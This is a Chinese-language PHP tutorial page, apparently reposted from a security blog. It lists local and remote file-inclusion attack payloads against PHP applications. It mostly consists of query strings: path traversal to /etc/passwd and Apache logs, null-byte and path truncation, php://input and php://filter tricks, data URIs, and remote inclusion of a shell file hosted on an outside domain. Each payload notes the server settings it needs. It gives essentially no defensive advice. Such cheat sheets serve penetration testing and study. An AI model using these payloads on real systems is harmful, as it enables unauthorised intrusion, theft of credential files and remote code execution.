• 技术文章 >后端开发 >php教程

    关于PHP文件包含一些漏洞分析_PHP教程

    2016-07-13 17:10:33原创696
    文章简单的分析了在php文件包含时inlcude的一个漏洞分析,下面希望对大家有点用处哦。

    基本的文件包含漏洞:

    代码如下 复制代码

    * 包含同路径下的文件:
    ?file=.htaccess
    * 路径遍历:
    ?file=../../../../../../../../../var/lib/locate.db
    (该文件非常有趣因为它允许你搜索文件系统)
    * 包含注入PHP代码的文件:
    ?file=../../../../../../../../../var/log/apache/error.log
    (you can find other possible Apache dirs here and other ways here. Think about all possible logfiles, file uploads, session files etc.)

    受限的本地文件包含:

    代码如下 复制代码

    * 空字符注入(Null Byte Injection):
    ?file=../../../../../../../../../etc/passwd%00
    (需要magic_quotes_gpc=off)
    * 列目录(Null Byte Injection):
    ?file=../../../../../../../../../var/www/accounts/%00
    (仅限BSD, 需要magic_quotes_gpc=off,详细信息here)
    *路径截断(Path Truncation):
    ?file=../../../../../../../../../etc/passwd........... …
    (详细信息参见 here 和 here)
    * 点号截断:
    ?file=../../../../../../../../../etc/passwd……………. …
    (仅限Windows, 更多细节参见 here)

    基本的远程文件包含:

    代码如下 复制代码


    * 包含远程代码(Including Remote Code):

    ?file=[http|https|ftp]://websec.wordpress.com/shell.txt

    (需要 allow_url_fopen=On 和 allow_url_include=On)

    * 使用php输入流(Using PHP stream php://input):

    ?file=php://input
    (specify your payload in the POST parameters, watch urlencoding, details here, requires allow_url_include=On)

    * 使用PHP过滤函数(Using PHP stream php://filter):
    ?file=php://filter/convert.base64-encode/resource=index.php
    (lets you read PHP source because it wont get evaluated in base64. More details here and here)
    * Using data URIs:
    ?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=
    (需要 allow_url_include=On)

    * 用于跨站脚本攻击(Using XSS):

    代码如下 复制代码
    ?file=http://127.0.0.1/path/xss.php?xss=phpcode
    (makes sense if firewalled or only whitelisted domains allowed)

    受限的远程文件包含漏洞

    代码如下 复制代码

    * ?file=http://websec.wordpress.com/shell
    * ?file=http://websec.wordpress.com/shell.txt?
    * ?file=http://websec.wordpress.com/shell.txt%23
    (需要 allow_url_fopen=On 和 allow_url_include=On)

    静态远程文件包含漏洞:

    代码如下 复制代码


    * 中间人攻击(Man In The Middle)
    (lame indeed, but often forgotten)


    来自Reiners’ Weblog。

    www.bkjia.comtruehttp://www.bkjia.com/PHPjc/629654.htmlTechArticle文章简单的分析了在php文件包含时inlcude的一个漏洞分析,下面希望对大家有点用处哦。 基本的文件包含漏洞: 代码如下 复制代码 ?php inclu...

    声明:本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn核实处理。
    专题推荐:关于 PHP 文件 包含 一些 漏洞 分析 文章 简单 分析 php 文件 包含 inlcude 一个
    上一篇:PHP5.2.X防止Hash冲突拒绝服务攻击的Patch方法_PHP教程 下一篇:PHP $_REQUEST数组安全隐患_PHP教程
    20期PHP线上班

    相关文章推荐

    • 【活动】充值PHP中文网VIP即送云服务器• ThinkPHP2.0调整使用Smarty模板 • 关于PHP的_set()跟_get() • PHP基础知识小结 • DoitPHP 1.2正式公布 • MAC Environment Setting Up(二)PHP environment
    1/1

    PHP中文网